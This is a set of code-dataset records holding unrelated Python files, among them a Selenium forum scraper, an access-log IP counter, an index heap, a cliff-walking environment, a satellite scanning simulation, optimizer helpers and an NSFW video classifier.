\"Mariano Reingart\",\n maintainer_email = \"reingart@gmail.com\",\n url='http://code.google.com/p/pyfpdf',\n download_url=\"http://pyfpdf.googlecode.com/files/pyfpdf-%s.tar.gz\" % fpdf.__version__,\n packages=['fpdf', ],\n package_dir={'fpdf': package_dir},\n package_data={'fpdf': ['font/*.ttf', 'font/*.txt']},\n classifiers = [\n \"Development Status :: 5 - Production/Stable\",\n \"Intended Audience :: Developers\",\n \"License :: OSI Approved :: GNU Lesser General Public License v3 (LGPLv3)\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 2.5\",\n \"Programming Language :: Python :: 2.6\",\n \"Programming Language :: Python :: 2.7\",\n \"Programming Language :: Python :: 3.2\",\n \"Operating System :: OS Independent\",\n \"Topic :: Software Development :: Libraries :: PHP Classes\",\n \"Topic :: Software Development :: Libraries :: Python Modules\",\n \"Topic :: Multimedia :: Graphics\",\n ],\n keywords=\"pdf unicode png jpg\",\n )\n\n","sub_path":"fpdf-1.7.hg/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"638813636","text":"# 目標:用selenium打開Dcard網址, 搜尋關鍵字並印出所有標題\r\n\r\n# ChromeDriver下載網址\r\n# https://sites.google.com/a/chromium.org/chromedriver/downloads\r\n\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.keys import Keys\r\n\r\n# Explicit Waits功能\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\n\r\nimport time\r\n\r\n# 本範例預設將ChromeDriver存至個人桌面, 可自行調整路徑\r\nPATH = \"C:/Users/user/Desktop/chromedriver.exe\"\r\ndriver = webdriver.Chrome(PATH)\r\n\r\ndriver.get(\"https://www.dcard.tw/f\")\r\nsearch = driver.find_element_by_name(\"query\")\r\nsearch.clear() # 清除欄位, 避免網頁帶有預設值\r\nsearch.send_keys(\"工作\")\r\nsearch.send_keys(Keys.RETURN)\r\n\r\n# 等待driver最多20秒, 直到class_name出現sc-3yr054-1\r\nWebDriverWait(driver, 20).until(\r\n EC.presence_of_element_located((By.CLASS_NAME, \"sc-3yr054-1\"))\r\n)\r\n\r\n# 找出每個class_name, 用迴圈印出\r\ntitles = driver.find_elements_by_class_name(\"tgn9uw-3\")\r\nfor title in titles:\r\n print(title.text)\r\n\r\nlink = driver.find_element_by_link_text(\"跟對方延後報到結果...怎麼辦\")\r\nlink.click() # 點擊\r\ndriver.back() # 回上一頁\r\ndriver.forward() # 回下一頁\r\n\r\ntime.sleep(3)\r\ndriver.quit()\r\n","sub_path":"CrawlerPractice/Dcard_selenium.py","file_name":"Dcard_selenium.py","file_ext":"py","file_size_in_byte":1351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"306800018","text":"# 3. 
Suppose we have an access.log web server log.\n# Write a function that receives a file name and returns the ten IP addresses from which there were the most requests\n# The lib https://pypi.org/project/IPy/ could help you work with IPs\n# Write tests using unittest/pytest.\n\nimport pandas as pd\nfrom IPy import IP\n\nlogfile = 'access.log'\n\n\nclass TopTen:\n    def __init__(self):\n        self.filename = ''\n        self.res = []\n\n    def getlist(self):\n        return self.res\n\n    def setfilename(self, lfile):\n        print(\"--\", self.filename)\n        self.filename = lfile\n        print(self.filename)\n\n    def top_ten_ip(self):\n        print(self.filename)\n        data = pd.read_csv(self.filename, sep=\" \", header=None)  # bug fix: was hard-coded to 'access.log', ignoring setfilename\n        self.res = data[0].value_counts()\n        self.res = self.res.reset_index(inplace=False)\n        self.res = self.res['index'][:10].to_list()\n        for ip in self.res:\n            print(IP(ip).strNormal())\n\n\ndef main():\n    topten = TopTen()\n    topten.setfilename(logfile)\n    topten.top_ten_ip()\n    print(topten.getlist())\n\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"TopTen.py","file_name":"TopTen.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"20081191","text":"from Array import Array\nfrom random import randint\n\n\nclass IndexHeap:\n    def __init__(self, capacity):\n        # data holds the heap's elements\n        self._data = Array(capacity=capacity)\n        # index[i] is the element position (in data) stored at heap slot i\n        self._index = Array(capacity=capacity)\n        # reversed[i] is the heap slot of element i (the inverse of index)\n        self._reversed = Array(capacity=capacity)\n        for i in range(capacity):\n            self._reversed.add(i, -1)\n        self.capacity = capacity\n        self.count = 0\n\n    def getSize(self):\n        return self.count\n\n    def getCapacity(self):\n        return self.capacity\n\n    def isEmpty(self):\n        return self.count == 0\n\n    def add(self, i, ele):\n        self._data.add(i, ele)\n\n        self._index.add_last(i)\n        self._reversed.set(i, self.count)\n        self.count += 1\n        self._shiftUp(self._data.get_size() - 1)\n\n    def extractMax(self):\n        if self.count <= 0:  # bug fix: was '< 0', which never triggered for an empty heap\n            raise ValueError(\"heap is empty\")\n        ele = self._data.get(self._index.get_first())\n        self._index.set(0, self._index.get_last())\n        self.count -= 1\n        if self.count != 0:\n            self._index.remove_last()\n            self._shiftDown(0)\n        return ele\n\n    def leftChild(self, index):  # renamed from the misspelled 'leftChid'\n        return 2 * index + 1\n\n    def rightChild(self, index):\n        return 2 * index + 2\n\n    def _shiftDown(self, index):\n        if index < 0:\n            raise ValueError(\"index should be positive\")\n        cur = self._data.get(self._index.get(index))\n        cur_index = self._index.get(index)\n        while self.leftChild(index) < self._index.get_size():\n            max_index = self.leftChild(index)\n            if self.rightChild(index) < self._index.get_size() and self._data.get(\n                    self._index.get(self.rightChild(index))) > self._data.get(self._index.get(self.leftChild(index))):\n                max_index = self.rightChild(index)\n            if self._data.get(self._index.get(max_index)) > cur:\n                self._index.set(index, self._index.get(max_index))\n                self._reversed.set(self._index.get(max_index), index)\n                index = max_index\n            else:\n                break\n        self._index.set(index, cur_index)\n        self._reversed.set(self._index.get(index), index)  # bug fix: the heap slot is 'index', not 'cur_index'\n\n    def _shiftUp(self, index):\n        if index < 0:\n            raise ValueError(\"index should be positive\")\n        cur = self._data.get(self._index.get(index))\n        cur_index = self._index.get(index)\n        while (index - 1) // 2 >= 0:\n            parent = (index - 1) // 2\n            if self._data.get(self._index.get(parent)) < cur:\n                self._index.set(index, self._index.get(parent))\n                self._reversed.set(self._index.get(index), index)\n                index = (index - 1) // 2\n            else:\n                # parent is not smaller, so the heap property already holds\n                
break\n        self._index.set(index, cur_index)\n        self._reversed.set(self._index.get(index), index)\n\n    def extractMaxIndex(self):\n        if self.count <= 0:  # bug fix: was '< 0'\n            raise ValueError(\"heap is empty\")\n        ele = self._index.get_first()  # bug fix: get_size() returned the heap size instead of the max element's index\n        self._index.set(0, self._index.get_last())\n        self._reversed.set(self._index.get(0), 0)\n        self._reversed.set(self._index.get_last(), -1)\n        self.count -= 1\n\n        if self.count != 0:\n            self._index.remove_last()\n            self._shiftDown(0)\n        return ele\n\n    def contains(self, index):\n        return self._reversed.get(index) != -1\n\n    def getItem(self, index):\n        assert self.contains(index)\n        return self._data.get(index)\n\n    def change(self, i, item):\n        assert self.contains(i)\n        self._data.set(i, item)\n        # find the position j in index where index[j] == i\n        # then shiftUp(j) and shiftDown(j)\n        # O(n)\n        # for j, w in enumerate(self._index):\n        #     if w == i:\n        #         self._shiftDown(j)\n        #         self._shiftUp(j)\n        #         return\n        j = self._reversed.get(i)\n        self._shiftUp(j)\n        self._shiftDown(j)\n\n    def __str__(self):\n        return str(\n            ' heap_index: {}, heap_value:{},capacity: {},size:{}'.format(self._data, self._index, self.capacity,\n                                                                         self.count))\n\n\nif __name__ == \"__main__\":\n    # indexHeap = IndexHeap(100000)\n    # random_list = [randint(-1000, 1000) for _ in range(10000)]\n    # for index, i in enumerate(random_list):\n    #     indexHeap.add(index, i)\n    #\n    # # print(indexHeap.getItem(9))\n    #\n    # for _ in range(len(random_list)):\n    #     print(indexHeap.extractMax())\n    # # print(indexHeap)\n\n    indexHeap = IndexHeap(5)\n    alist = [1, 2, 4, 5, 6]\n    for index, i in enumerate(alist):\n        indexHeap.add(index, i)\n\n    indexHeap.change(1,10)\n\n    for _ in range(len(alist)):\n        print(indexHeap.extractMax())\n","sub_path":"Chapter10_MaxHeap/IndexHeap.py","file_name":"IndexHeap.py","file_ext":"py","file_size_in_byte":4911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"211510474","text":"# #### BEGIN LICENSE BLOCK #####\n# Version: MPL 1.1/GPL 2.0/LGPL 2.1\n#\n# The contents of this file are subject to the Mozilla Public License Version\n# 1.1 (the \"License\"); you may not use this file except in compliance with\n# the License. You may obtain a copy of the License at\n# http://www.mozilla.org/MPL/\n#\n# Software distributed under the License is distributed on an \"AS IS\" basis,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License\n# for the specific language governing rights and limitations under the\n# License.\n#\n#\n# Contributor(s):\n#\n#   Bin.Li (ornot2008@yahoo.com)\n#\n#\n# Alternatively, the contents of this file may be used under the terms of\n# either the GNU General Public License Version 2 or later (the \"GPL\"), or\n# the GNU Lesser General Public License Version 2.1 or later (the \"LGPL\"),\n# in which case the provisions of the GPL or the LGPL are applicable instead\n# of those above. If you wish to allow use of your version of this file only\n# under the terms of either the GPL or the LGPL, and not to allow others to\n# use your version of this file under the terms of the MPL, indicate your\n# decision by deleting the provisions above and replace them with the notice\n# and other provisions required by the GPL or the LGPL. 
If you do not delete\n# the provisions above, a recipient may use your version of this file under\n# the terms of any one of the MPL, the GPL or the LGPL.\n#\n# #### END LICENSE BLOCK #####\n#\n# /\n\n\nimport sys\n\nimport numpy as np\n\nfrom env.base_discrete_env import PureDiscreteEnv\n\nUP = 0\nRIGHT = 1\nDOWN = 2\nLEFT = 3\n\n\nclass CliffWalkingEnv(PureDiscreteEnv):\n\n metadata = {'render.modes': ['human', 'ansi']}\n\n def _limit_coordinates(self, coord):\n coord[0] = min(coord[0], self.shape[0] - 1)\n coord[0] = max(coord[0], 0)\n coord[1] = min(coord[1], self.shape[1] - 1)\n coord[1] = max(coord[1], 0)\n return coord\n\n def _calculate_transition_prob(self, current, delta):\n new_position = np.array(current) + np.array(delta)\n new_position = self._limit_coordinates(new_position).astype(int)\n new_state = np.ravel_multi_index(tuple(new_position), self.shape)\n reward = -100.0 if self._cliff[tuple(new_position)] else -1.0\n is_done = self._cliff[tuple(new_position)] or (\n tuple(new_position) == (3, 11))\n return [(1.0, new_state, reward, is_done)]\n\n def __init__(self):\n self.shape = (4, 12)\n\n nS = np.prod(self.shape)\n nA = 4\n\n # Cliff Location\n self._cliff = np.zeros(self.shape, dtype=np.bool)\n self._cliff[3, 1:-1] = True\n\n # Calculate transition probabilities\n P = {}\n for s in range(nS):\n position = np.unravel_index(s, self.shape)\n P[s] = {a: [] for a in range(nA)}\n P[s][UP] = self._calculate_transition_prob(position, [-1, 0])\n P[s][RIGHT] = self._calculate_transition_prob(position, [0, 1])\n P[s][DOWN] = self._calculate_transition_prob(position, [1, 0])\n P[s][LEFT] = self._calculate_transition_prob(position, [0, -1])\n\n # We always start in state (3, 0)\n isd = np.zeros(nS)\n isd[np.ravel_multi_index((3, 0), self.shape)] = 1.0\n\n super(CliffWalkingEnv, self).__init__(nS, nA, P, isd)\n\n def render(self, mode='human', close=False):\n if close:\n return\n\n outfile = sys.stdout\n\n for s in range(self.nS):\n position = np.unravel_index(s, self.shape)\n # print(self.s)\n if self.s == s:\n output = \" x \"\n elif position == (3, 11):\n output = \" T \"\n elif self._cliff[position]:\n output = \" C \"\n else:\n output = \" o \"\n\n if position[1] == 0:\n output = output.lstrip()\n if position[1] == self.shape[1] - 1:\n output = output.rstrip()\n output += \"\\n\"\n\n outfile.write(output)\n outfile.write(\"\\n\")\n\n def reset(self, randomly=True):\n if randomly:\n return super().reset(True)\n\n # hard coded , the index is (3,0)\n return np.ravel_multi_index((3, 0), self.shape)\n","sub_path":"work/env/cliff_walking.py","file_name":"cliff_walking.py","file_ext":"py","file_size_in_byte":4243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"189317592","text":"import datetime\nfrom datetime import date\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n\n#Read the data file\nytsubs_df = pd.read_csv('Totals.csv')\nprint(ytsubs_df.shape)\n\nytsubs_df.iloc[0,1] = 12\n\nytsubs_df['TotalSubscribers'] = ytsubs_df['Subscribers'].cumsum()\n\ndef forecast_with_Rwf(df,col,h):\n \"\"\"Calculate and return the forecasts using Naive with Drift method also called random walk forecast method\n Return: forecast - list containing the point forecasts\n Input: df - dataframe containing the time series columns\n col - Name of the column in the dataframe containing the time series\n h - Time period for which to forecast\n \"\"\"\n y_1 , y_T = df[col].iloc[1] , df[col].iloc[-1]\n T = df[col].shape[0]\n 
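# Random-walk-with-drift point forecast: yhat(T+h) = y_T + h*(y_T - y_1)/(T-1),\n    # i.e. the last observation extrapolated along the average historical slope.\n    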
forecast = []\n    for step in range(1, h + 1):  # bug fix: the loop hard-coded range(1,31) and shadowed the h argument\n        val = y_T + (step*(y_T-y_1)/(T-1))\n        forecast.append(int(val))\n    return forecast\n\n\ndef generate_date_range(start_date,numdays=30,fmt='%Y-%m-%d',direction='forward'):\n    \"\"\"Generate the date range from the given start date for the number of days in the given direction\n    Input: start_date - starting date from which to create the date range; expected format YYYY-MM-DD\n           numdays - Number of days for which the date range needs to be generated\n           fmt - date format to be returned\n           direction - forward or backward direction\n    \"\"\"\n    base = datetime.datetime.strptime(start_date,'%Y-%m-%d') \n    if direction=='forward':\n        date_list = [(base + datetime.timedelta(days=x)).strftime(fmt) for x in range(numdays)]\n    elif direction=='backward':# reverse date range\n        date_list = [(base - datetime.timedelta(days=x)).strftime(fmt) for x in range(numdays)]\n    else:\n        print('direction value should be either \"forward\" or \"backward\"')\n        return None\n    return date_list\n\nfcast_rwf = forecast_with_Rwf(ytsubs_df,'TotalSubscribers',30)\n\nfcast_rwf_df = pd.DataFrame({'Date':generate_date_range('2021-01-02'), 'TotalSubscribers':fcast_rwf})\n\nprint(fcast_rwf_df)\nprint(fcast_rwf[-1])\nplt.plot(ytsubs_df['TotalSubscribers'])\nplt.show()","sub_path":"YoutubSubsForecast.py","file_name":"YoutubSubsForecast.py","file_ext":"py","file_size_in_byte":2142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"560074440","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jun 18 14:59:19 2018\n\n@author: vallevaro\n\"\"\"\n\nfrom quaternion import*\nfrom sympy import*\nfrom sympy import Line3D, Point3D\nimport numpy as np\nimport math\nimport matplotlib.pyplot as plt\n\nclass Observation: \n    '''\n    Creates an object equivalent to an observation. \n\n    Horizontal Celestial Coordinates: self.coor = (azimuth, altitude)\n    \n    Calculates equivalence to Cartesian Coordinates: self.vector = (x, y, z)\n    '''\n    def __init__(self, azimuth, altitude):\n        self.azimuth = azimuth\n        self.altitude = altitude\n        self.coor = np.array([self.azimuth, self.altitude])\n        \n        self.x = np.cos(self.azimuth)*np.cos(self.altitude)\n        self.y = np.sin(self.azimuth)*np.cos(self.altitude)\n        self.z = np.sin(self.altitude)\n        \n        self.observations = [] \n        self.measurements = [] \n        self.times = [] \n        self.indexes = []\n        \n        self.vector = unit_vector(np.array([self.x,self.y,self.z])) \n        \nclass Sky: \n    '''\n    Creates a sky in the unit sphere, in the BCRS frame.\n    List of elements: sky.elements\n    '''\n    def __init__(self, n):\n        self.elements = []\n        \n        for n in range(n):\n            azimuth = np.random.uniform(0, (2*np.pi))\n            altitude = np.random.uniform(-np.pi/2., np.pi/2)\n            obs = Observation(azimuth, altitude)\n            self.elements.append(obs) \n        \nclass Satellite: \n    '''\n    The Satellite object is assumed to be a plane.\n    A plane is determined completely by a Point and a Vector.\n    \n    __init__: define the satellite by giving a point and a vector - default: point at (0,0,0)\n    \n    satellite.Rotate(_): introduce in _ a quaternion (from Quaternion class) to rotate the plane (aka satellite)\n    \n    satellite.Scan(_): introduce in _ the sky to be scanned. \n    satellite.observations = objects with coordinates in the SRS frame.\n    satellite.measurements = objects with coordinates in the BCRS frame.\n    satellite.times = angle at which a star interception occurs.\n    satellite.indexes = the indexes of the observations made wrt the sky catalogue. 
\n    Scan():\n    \n    Azimuth angle (Phi): indicates the radians swept by the scanner in the satellite plane. \n    This scanner checks stars by stepping 'deltaphi' radians at a time in the satellite plane.\n    Altitude angle (zeta): the altitude width angle of the scanner (width of the vertical field of view wrt the satellite plane)\n\n    '''\n    def __init__(self,z1,z2,z3, origin = Point3D(0,0,0)): \n        self.zaxis = unit_vector(np.array([z1,z2,z3])) \n        self.xyplane = Plane(origin, vector_to_point(self.zaxis))\n        self.attitude = Quaternion(1.,0.,0.,0.).unit()\n\n    \n    def Rotate(self, newrotation): \n        self.attitude = newrotation.unit() * self.attitude \n        self.attitude.basis()\n        \n        self.zaxis = unit_vector(np.dot(self.attitude.A, self.zaxis)) \n        self.xyplane = Plane((0.,0.,0.), vector_to_point(self.zaxis))\n        \n    def ViewLine(self, phi, zeta):\n        self.phi = phi\n        self.zeta = zeta \n\n    def Scan(self, sky, zeta = np.radians(5.), phi= math.radians(360.), deltaphi = math.radians(1.)): \n\n        '''\n        Calculates in the BCRS the angle between the plane of the satellite and the line from the centre of the satellite to the star.\n        This angle is -zeta_angle_star_plane.\n        '''\n        self.observations = [] \n        self.measurements = [] \n        self.times = [] \n        self.indexes = []\n        \n        for idx, star in enumerate(sky.elements): \n            star_point = vector_to_point(star.vector) \n            star_line = Line3D(self.xyplane.args[0], star_point) \n            arc_angle_star_xyplane = self.xyplane.angle_between(star_line) \n            if len(arc_angle_star_xyplane.args) == 2:\n                zeta_angle_star_plane = -float(arc_angle_star_xyplane.args[1])\n            if len(arc_angle_star_xyplane.args) == 1:\n                zeta_angle_star_plane = float(arc_angle_star_xyplane.args[0])\n            \n\n            if -zeta/2. < (zeta_angle_star_plane) < zeta/2.: \n                self.indexes.append(idx)\n                \n                proy_star_point = self.xyplane.projection(star_point) \n                proy_star_vector = point_to_vector(proy_star_point) \n                proy_star_vector_srs = SRS(self, proy_star_vector) \n                \n                phi_angle_obs = np.arctan2(float(proy_star_vector_srs[1]), float(proy_star_vector_srs[0]))\n                zeta_angle = np.arctan2(float(proy_star_vector_srs[2]), float(np.sqrt((proy_star_vector_srs[0])**2+(proy_star_vector_srs[1])**2)))  # bug fix: the second squared term used index [0] twice\n                \n                if phi_angle_obs < 0.:\n                    phi_angle_obs = phi_angle_obs + 2*np.pi\n                observation = Observation(phi_angle_obs, zeta_angle)\n                self.observations.append(observation)\n                \n        '''\n        Once observations are made, we sweep the scanner to see at what times each star is in the detector's range\n        '''\n        #maybe change this to +- deltaphi/2 at some point? 
but careful that phi > 0\n        for i in np.arange(0, phi, deltaphi):\n            self.ViewLine(i, 0)\n            axis1phi = self.phi%(2*np.pi) \n            axis2phi = (self.phi + deltaphi)%(2*np.pi)\n            \n            for observation in self.observations:\n                if axis1phi < observation.azimuth and observation.azimuth < axis2phi:\n                    time = i%(np.pi*2)\n                    self.times.append(time) \n    \n    \n################################## FUNCTIONS ##################################\n\ndef vector(x,y,z): \n    return np.array([x,y,z])\n\ndef unit_vector(vector): \n    return vector / np.linalg.norm(vector) \n    \ndef vector_to_point(vector):\n    return Point3D(vector[0], vector[1], vector[2])\n    \ndef point_to_vector(point):\n    #return np.array([point[0], point[1], point[2]]) \n    return np.array([point.x, point.y, point.z]) \n\ndef vector_to_quaternion(vector):\n    return Quaternion(0, float(vector[0]), float(vector[1]), float(vector[2])) #added float arguments to prevent Point3D fractions from being passed to the quaternion class.\n    \ndef rotation_quaternion(vector, angle): \n    ''' \n    Calculates the Quaternion equivalent to a rotation given by a vector and an angle in radians.\n    '''\n    vector = unit_vector(vector) \n    t = np.cos(angle/2.)\n    x = np.sin(angle/2.)*vector[0]\n    y = np.sin(angle/2.)*vector[1]\n    z = np.sin(angle/2.)*vector[2]\n    \n    qvector = Quaternion(t,x,y,z)\n    return qvector\n\n    \ndef SRS(satellite, vector):\n    '''\n    Changes coordinates of a vector in BCRS to the SRS frame.\n    '''\n    q_vector_bcrs= vector_to_quaternion(vector)\n    q_vector_srs = satellite.attitude * q_vector_bcrs * satellite.attitude.conjugate() #AL- Swapped to put conjugate on RHS of vector\n    return np.array([q_vector_srs.x, q_vector_srs.y, q_vector_srs.z]) \n    \ndef BCRS(satellite, vector):\n    '''\n    Changes coordinates of a vector in SRS to the BCRS frame.\n    '''\n    q_vector_srs= vector_to_quaternion(vector)\n    #q_vector_bcrs = satellite.attitude * q_vector_srs * satellite.attitude.conjugate()\n    q_vector_bcrs = satellite.attitude.conjugate() * q_vector_srs * satellite.attitude #AL- Swapped to put conjugate on LHS of vector\n    \n    return np.array([q_vector_bcrs.x, q_vector_bcrs.y, q_vector_bcrs.z])\n    \ndef Measurements(satellite): \n    '''\n    Takes all observation objects of the satellite (which are in the SRS frame) and converts them into the BCRS frame, making them observation-objects.\n    self.measurements are objects with BCRS coordinates.\n    '''\n    satellite.measurements =[] \n    for obs in satellite.observations: \n        star_vector = BCRS(satellite, obs.vector)\n        alpha = np.arctan2(star_vector[1], star_vector[0])\n        delta = np.arctan2(star_vector[2], np.sqrt(star_vector[0]**2 + star_vector[1]**2))\n        if alpha < 0 :\n            alpha = alpha + 2*np.pi\n        star = Observation(alpha, delta)\n        satellite.measurements.append(star) \n    \ndef Psi(satellite, sky):\n    '''\n    Calculates the difference between the coordinates of a star versus its corresponding coordinates (BCRS-framed) from Gaia.\n    '''\n    bcrs_stars_vector = [BCRS(satellite, obs.vector) for obs in satellite.observations]\n    list_true_star_vector = [sky.elements[idx].vector for idx in satellite.indexes]\n    diff = np.subtract(bcrs_stars_vector, list_true_star_vector)\n    return diff\n\n    \ndef Plot(satellite, sky): \n    '''\n    Plot: measurements (coordinates of stars measured by Gaia and transformed into the BCRS frame) vs true coordinates of the detected stars. 
\n    Measurements(satellite)\n    azimuth_obs = [star.coor[0] for star in satellite.measurements]\n    altitude_obs = [star.coor[1] for star in satellite.measurements]\n    \n    azimuth_star = [sky.elements[idx].coor[0] for idx in satellite.indexes]\n    altitude_star = [sky.elements[idx].coor[1] for idx in satellite.indexes]\n    \n    plt.figure() \n    plt.grid()\n    plt.ylabel('Altitude (rad)')\n    plt.xlabel('Azimuth (rad)')\n    plt.title('Measurements vs True Stars')\n    \n    red_dot, = plt.plot(azimuth_obs, altitude_obs, 'r*')\n    blue_dot, = plt.plot(azimuth_star, altitude_star, 'bo')\n\n    plt.legend([red_dot, (red_dot, blue_dot)], [\"Obs\", \"True Star\"])\n    plt.show()\n    \n\n    \n    \n\n    \n    \n    \n    \n    \n    \n    \n    \n","sub_path":"packages/scan/scanner_static.py","file_name":"scanner_static.py","file_ext":"py","file_size_in_byte":9971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"580802469","text":"# UPLOAD_DIR = 'F:\\\\'\n# UPLOAD_FILENAMES = ['file1', 'file2']\nUPLOAD_DIR = '/home/sse/Desktop/data/'\nUPLOAD_FILENAMES = [\n    '118Drug and Target.txt',\n    'chart.txt',\n    'GO-BPlist.txt',\n    'all_target.txt',\n    '6_ppi.net',\n    '6_ppi.node',\n    'inter-targetShortestPathLength.matrix',\n    'CN.node',\n    'Cancer_Network.net',\n    'Pathway-Target-Matrix.txt',\n    'Gene-GeneInteraction.csv',\n    'Pathway.txt',\n    'Pathway-Target-Matrix.uniprot.txt',\n    '26PositiveLabel.txt',\n    'Dis.matrix',\n    'DCI.matrix',\n    'Eff.Degree.matrix',\n    'Eff.Betweenness.matrix',\n    'Eff.Evcent.matrix',\n    'MP.U.matrix']\n\n# DOWNLOAD_FILENAME = 'test.txt'\nDOWNLOAD_FILENAME = '00Result_Rank.txt'\nDOWNLOAD_DIR = '/home/sse/Desktop/data/'\nFILENAME = 'datafiles'\n\n# JOB_START_URL = 'http://localhost:8000/test'\n# JOB_STOP_URL = 'http://localhost:8000/test'\nJOB_START_URL = 'http://localhost:4000/job/start'\nJOB_STOP_URL = 'http://localhost:4000/job/stop'\n\nJOB_STATUS_SUCCESS = 0\nJOB_STATUS_FAILED = 1\nJOB_STATUS_RUNNING = 2\nJOB_STATUS_STOP = 3\n\nRESPONSE_STATUS_ERROR = 1\n\njob_status = JOB_STATUS_SUCCESS\nupload_success = False\n","sub_path":"main_app/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"436511585","text":"\"\"\"\nUtility code for constructing optimizers and scheduling learning rates.\n\"\"\"\n\n# System\nimport math\nfrom functools import partial\n\n# Externals\nfrom tensorflow import keras\nimport horovod.tensorflow.keras as hvd\n\ndef _lr_schedule(epoch, base_lr, peak_lr, n_warmup_epochs, decay_schedule={}):\n    \"\"\"Learning rate schedule function.\n\n    Gives the learning rate as a function of epoch according to\n    additional settings:\n        base_lr: baseline unscaled learning rate at beginning of training.\n        peak_lr: scaled learning rate at end of warmup period\n        n_warmup_epochs: number of linear warmup epochs\n        decay_schedule: a dict of epoch number -> decay factor\n    \"\"\"\n    # Linear LR warmup\n    if epoch < n_warmup_epochs:\n        return epoch * (peak_lr - base_lr) / n_warmup_epochs + base_lr\n    else:\n        # Find the most recent decay factor\n        decay_factor = 1.\n        decay_epoch = 0\n        for e, d in decay_schedule.items():\n            if e >= decay_epoch and e < epoch:\n                decay_epoch, decay_factor = e, d\n        return peak_lr * decay_factor\n\ndef get_lr_schedule(base_lr, global_batch_size, base_batch_size=None,\n                    scaling=None, n_warmup_epochs=0, decay_schedule={}):\n    \"\"\"Get the learning rate schedule function\"\"\"\n    if scaling == 'linear':\n        peak_lr = base_lr * global_batch_size / base_batch_size\n    elif scaling == 'sqrt':\n        peak_lr = base_lr * math.sqrt(global_batch_size / base_batch_size)\n    else:\n        peak_lr = base_lr\n    return partial(_lr_schedule, base_lr=base_lr, peak_lr=peak_lr,\n                   n_warmup_epochs=n_warmup_epochs,\n                   decay_schedule=decay_schedule)
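# Illustrative sketch (not from the original file): the schedule above warms up
# linearly from base_lr to peak_lr over n_warmup_epochs, then applies the decay
# factor of the most recent epoch listed in decay_schedule. The same shape,
# standalone and with invented demo numbers:
def lr_at(epoch, base_lr=0.1, peak_lr=0.4, n_warmup_epochs=4, decay_schedule={8: 0.1}):
    if epoch < n_warmup_epochs:
        return epoch * (peak_lr - base_lr) / n_warmup_epochs + base_lr
    factor = 1.0
    for e, d in sorted(decay_schedule.items()):
        if e < epoch:            # most recent decay boundary already passed
            factor = d
    return peak_lr * factor

# epochs 0..3 ramp from 0.1; epochs 4..8 sit at the 0.4 peak; epoch 9+ drop tenfold
assert lr_at(0) == 0.1 and lr_at(4) == 0.4 and abs(lr_at(9) - 0.04) < 1e-12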
\n\ndef get_optimizer(name, distributed=False, **opt_args):\n    #lr, lr_scaling='linear', n_ranks=1,\n    \"\"\"Configure the optimizer\"\"\"\n\n    # Construct the optimizer\n    OptType = getattr(keras.optimizers, name)\n    opt = OptType(**opt_args)\n\n    # Distributed optimizer wrapper\n    if distributed:\n        opt = hvd.DistributedOptimizer(opt)\n\n    return opt\n","sub_path":"utils/optimizers.py","file_name":"optimizers.py","file_ext":"py","file_size_in_byte":2053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"379613979","text":"# py classifier_video.py --video C:/Users/anlan/OneDrive/Desktop/1.mp4\nimport keras\nimport numpy as np\nimport cv2\nimport argparse\nap = argparse.ArgumentParser()\nap.add_argument(\"-i\", \"--video\", required = True,\n\thelp = \"Path to the image to be scanned\")\nargs = vars(ap.parse_args())\n\n\ndef load_images(image_paths, image_size):\n    loaded_images = []\n    loaded_image_paths = []\n    cap =cv2.VideoCapture(image_paths)\n    i = 0\n    while True:\n        i += 1\n        ret,frame = cap.read()\n        if ret:\n            if i % 28 == 0: # take one frame out of every 28 and add it to the array\n                image = cv2.resize(frame,(256, 256)) # resize image\n                image = image/255.0 # normalize pixel values to the range 0 to 1\n                loaded_images.append(image)\n                loaded_image_paths.append(image_paths)    \n        else:\n            break    \n    return np.asarray(loaded_images), loaded_image_paths\n\nclass Classifier():\n    nsfw_model = None\n    def __init__(self, model_path):\n        Classifier.nsfw_model = keras.models.load_model(model_path)\n\n    def classify(self, image_paths = \"\", batch_size = 32, image_size = (256, 256), categories = ['unsafe', 'safe']):\n        loaded_images, loaded_image_paths = load_images(image_paths, image_size)    \n        if not loaded_image_paths:\n            return {}\n        model_preds = Classifier.nsfw_model.predict(loaded_images, batch_size = batch_size) # predict on the whole array of frames  \n        images_preds = np.average(model_preds, axis = 0) # column-wise average over all frames\n        return images_preds\n\n\nif __name__ == '__main__':\n    weights_path = \"classifier_model\"\n    m = Classifier(weights_path)\n    result = m.classify(args[\"video\"])\n    # result = m.classify(\"C:/Users/anlan/OneDrive/Desktop/1.mp4\")\n    if result[0] > result[1]:\n        print(\"toxic\")\n    else: print(\"no toxic\")\n\n# {'safe': 0.01849486, 'unsafe': 0.9815051}}\n\n'''\nmodel_preds [[0.00747683 0.99252313]\n [0.00745127 0.9925487 ]\n [0.00669979 0.9933002 ]\n [0.00798242 0.9920176 ]\n [0.00657054 0.9934295 ]\n [0.00708546 0.99291456]\n [0.0066964  0.9933036 ]\n [0.00737985 0.99262017]\n [0.00903959 0.9909604 ]\n [0.0084687  0.9915314 ]\n [0.00824533 0.99175465]\n [0.00807763 